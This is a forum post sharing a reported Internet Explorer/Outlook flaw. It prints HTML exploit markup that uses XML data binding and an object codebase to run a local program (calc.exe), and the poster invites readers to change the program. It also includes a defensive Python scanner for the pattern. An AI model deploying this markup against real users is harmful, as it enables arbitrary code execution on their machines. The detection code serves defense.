Another IE/Outlook Hole

Status
Not open for further replies.

lokem

The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>


Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
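A defensive check for the pattern in the post above, as an added example that is not part of the original post or The Register's article: it flags HTML in which an element is data-bound to an XML island with dataformatas="html", and any object tag whose codebase is a local path. The function names, rule names and the benign sample are assumptions made for illustration.

```python
import re
from html import unescape

TAG_RE = re.compile(r"<\s*([a-zA-Z][\w:-]*)\b([^<>]*)>", re.S)
ATTR_RE = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
# Drive-letter path, UNC path or file: URL, i.e. a codebase that is not a download location.
LOCAL_PATH_RE = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.I)

def iter_tags(text):
    """Yield (tag_name, attrs) for every opening tag, including ones inside CDATA."""
    for tag in TAG_RE.finditer(text):
        attrs = {}
        for a in ATTR_RE.finditer(tag.group(2)):
            value = next(g for g in a.groups()[1:] if g is not None)
            attrs[a.group(1).lower()] = value.strip()
        yield tag.group(1).lower(), attrs

def scan_html(html):
    """Return sorted (rule, detail) findings for one HTML page or mail body."""
    findings, islands, bound = set(), set(), set()
    # Scan the raw text and an entity-decoded copy, since island content may be escaped.
    for text in {html, unescape(html)}:
        for name, attrs in iter_tags(text):
            if name == "xml" and "id" in attrs:
                islands.add(attrs["id"].lower())
            src = attrs.get("datasrc", "")
            if attrs.get("dataformatas", "").lower() == "html" and src.startswith("#"):
                bound.add(src[1:].lower())
            codebase = attrs.get("codebase", "")
            if name == "object" and LOCAL_PATH_RE.match(codebase):
                findings.add(("object-local-codebase", codebase))
    # Report a binding only when the island it points at is present in the same document.
    findings.update(("html-databinding", i) for i in bound & islands)
    return sorted(findings)

# Constructed samples: the markup from the post, and a benign page for comparison.
POSTED = '''<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]></exploit></security></xml>'''
BENIGN = '<p datasrc="#t" dataformatas="text"></p><object codebase="http://example.com/a.cab"></object>'

if __name__ == "__main__":
    for label, sample in (("posted", POSTED), ("benign", BENIGN)):
        print(label, scan_html(sample))
```
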
 